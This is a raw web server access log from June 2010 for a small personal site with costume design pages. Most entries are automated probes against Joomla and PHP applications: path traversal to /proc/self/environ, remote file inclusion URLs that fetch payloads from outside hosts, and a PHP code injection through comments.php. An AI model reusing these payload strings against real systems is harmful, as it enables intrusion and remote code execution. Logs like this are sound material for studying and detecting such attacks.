188.72.70.56 - - [06/Jun/2010:23:30:12 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
121.190.102.21 - - [06/Jun/2010:23:30:50 -0500] "GET /logs////index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:23:30:50 -0500] "GET /logs/access_log.1212451200%20%20////index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:23:30:50 -0500] "GET ////index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.81.68.114 - - [06/Jun/2010:23:31:08 -0500] "GET /logs//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.81.68.114 - - [06/Jun/2010:23:31:08 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.188.90.44 - - [06/Jun/2010:23:31:23 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:31:24 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:31:24 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:31:39 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.121.77.90 - - [06/Jun/2010:23:31:40 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
188.72.70.56 - - [06/Jun/2010:23:31:46 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
216.120.241.232 - - [06/Jun/2010:23:32:34 -0500] "GET /logs//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:32:34 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
188.72.70.56 - - [06/Jun/2010:23:32:44 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:32:55 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:33:05 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:33:05 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:33:06 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:33:08 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:33:09 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:33:14 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:33:14 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:33:14 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:33:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:33:47 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:33:47 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
72.55.146.140 - - [06/Jun/2010:23:36:09 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:36:10 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:36:10 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
188.72.70.56 - - [06/Jun/2010:23:36:15 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:36:15 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:36:16 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
87.253.162.10 - - [06/Jun/2010:23:36:26 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [06/Jun/2010:23:36:26 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [06/Jun/2010:23:37:00 -0500] "GET /logs/access_log.1274227200//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
67.59.156.163 - - [06/Jun/2010:23:37:01 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.59.156.163 - - [06/Jun/2010:23:37:01 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
209.188.90.44 - - [06/Jun/2010:23:37:30 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:38:55 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
91.190.243.10 - - [06/Jun/2010:23:39:02 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
91.190.243.10 - - [06/Jun/2010:23:39:02 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.190.243.10 - - [06/Jun/2010:23:39:02 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
188.72.70.56 - - [06/Jun/2010:23:39:07 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:08 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:08 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:10 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:10 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:10 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:12 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:12 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:12 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:39:17 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
91.190.243.10 - - [06/Jun/2010:23:40:10 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
91.190.243.10 - - [06/Jun/2010:23:40:11 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.190.243.10 - - [06/Jun/2010:23:40:11 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
93.89.215.70 - - [06/Jun/2010:23:40:39 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
93.89.215.70 - - [06/Jun/2010:23:40:39 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
93.89.215.70 - - [06/Jun/2010:23:40:40 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.190.243.10 - - [06/Jun/2010:23:41:22 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
188.72.70.56 - - [06/Jun/2010:23:42:04 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
91.121.208.42 - - [06/Jun/2010:23:42:18 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
89.145.108.230 - - [06/Jun/2010:23:42:21 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
203.217.44.101 - - [06/Jun/2010:23:42:29 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:33 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:34 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:34 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:34 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:35 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:38 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:40 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:41 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:41 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:41 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:41 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:41 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:42 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:42 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:42 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:42 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:42 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:42 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:42 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
67.225.141.62 - - [06/Jun/2010:23:42:48 -0500] "GET /logs/access_log.1274227200//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.225.141.62 - - [06/Jun/2010:23:42:48 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.225.141.62 - - [06/Jun/2010:23:42:48 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.167.132.200 - - [06/Jun/2010:23:42:48 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
203.217.44.101 - - [06/Jun/2010:23:42:48 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:49 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:49 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:49 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:49 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:49 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:49 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:49 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
203.217.44.101 - - [06/Jun/2010:23:42:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
91.190.243.10 - - [06/Jun/2010:23:42:56 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
80.233.172.42 - - [06/Jun/2010:23:43:07 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
89.111.176.88 - - [06/Jun/2010:23:43:19 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
173.160.141.237 - - [06/Jun/2010:23:43:40 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.89.215.70 - - [06/Jun/2010:23:44:00 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
188.72.70.56 - - [06/Jun/2010:23:44:13 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:44:20 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:44:36 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
91.190.243.10 - - [06/Jun/2010:23:44:48 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [06/Jun/2010:23:44:48 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.190.243.10 - - [06/Jun/2010:23:44:55 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [06/Jun/2010:23:44:55 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.210.190.230 - - [06/Jun/2010:23:45:16 -0500] "GET /logs/access_log.1274227200//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
62.210.190.230 - - [06/Jun/2010:23:45:16 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
62.210.190.230 - - [06/Jun/2010:23:45:16 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
207.46.13.53 - - [06/Jun/2010:23:45:36 -0500] "GET /logs/access_log.1212019200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.188.90.44 - - [06/Jun/2010:23:45:48 -0500] "GET /logs/access_log.1273363200/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:47:01 -0500] "GET /logs/access_log.1273017600/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
